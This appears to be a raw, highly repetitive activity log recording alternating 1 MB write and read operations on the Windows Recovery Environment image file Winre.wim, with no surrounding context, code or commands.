File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\Winre.wim, size = 1048576 True 1
Fn
